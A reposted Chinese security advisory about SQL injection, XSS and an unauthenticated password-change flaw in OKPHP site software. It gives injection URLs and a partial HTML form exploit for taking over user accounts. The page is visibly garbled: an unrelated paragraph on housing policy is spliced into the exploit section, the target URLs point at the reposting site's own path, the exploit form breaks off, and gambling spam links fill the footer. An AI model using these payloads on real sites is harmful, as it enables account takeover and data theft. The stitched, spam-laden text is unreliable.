okphp系列产品的多个漏洞

www.bjxdzj.com 更新:2008-01-11 编辑:tiger 来源:转载
本文作者:SuperHei
文章性质:原创
发布日期:2005-08-14
程序描叙
  OKPHP是由www.okphp.com开发一套专业的网站管理系统,目前产品包括:Okphp CMS, Okphp BBS,Okphp BLOG。由于对变量的过滤不严密及密码认证不严,导致sql注射,xss,隐藏变量post攻击从跨权限操作。
漏洞攻击
1、SQl注射及xss
  “几乎” 存在于各个变量里,如:forum.php

mg电子:国务院、银监会、央行都陆续发声,强调要坚持“房子是用来住的,不是用来炒的”定位,因城施策分类指导,引导资金流向实体经济,把防范金融风险放在更加重要的位置。

http://www.bjxdzj.com/mgdz/forum.php?action=view_forum&forum_id={sql}
http://www.bjxdzj.com/mgdz/forum.php?action=view_forum&forum_id=‘xss
.......
2、隐藏变量post攻击
  在提交request.php?action=user_modify 修改用户资料时,没有密码认证导致通过user_id修改容易用户密码及资料;
Exp:

<html>
<head>
<title>Okphp Discussions - powered by okphp BBS</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="bbs/themes/default/css/darkblue/css.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#CCCCCC" text="#000000">
<table class="forumline2" cellspacing="1" cellpadding="3" border="0">
<form name="form1" method="post" action="http://www.bjxdzj.com/mgdz/forum.php" enctype="multipart/form-data">
<tr>
<th colspan="2" background="bbs/themes/default/images/darkblue/th_bg.gif">修改信息</th>
</tr>
<tr class="row1"> </tr>
<tr class="row2">
<td width="20%" valign="top" align="right">密码</td>
<td width="80%">
<p>
<input type="password" name="password1" size="20">
重复输入

上一页:用Jmail写文件进硬盘      下一页:Discuz插件漏洞攻击

相关内容

合作: 银河赌球 乐透转轮 mg电子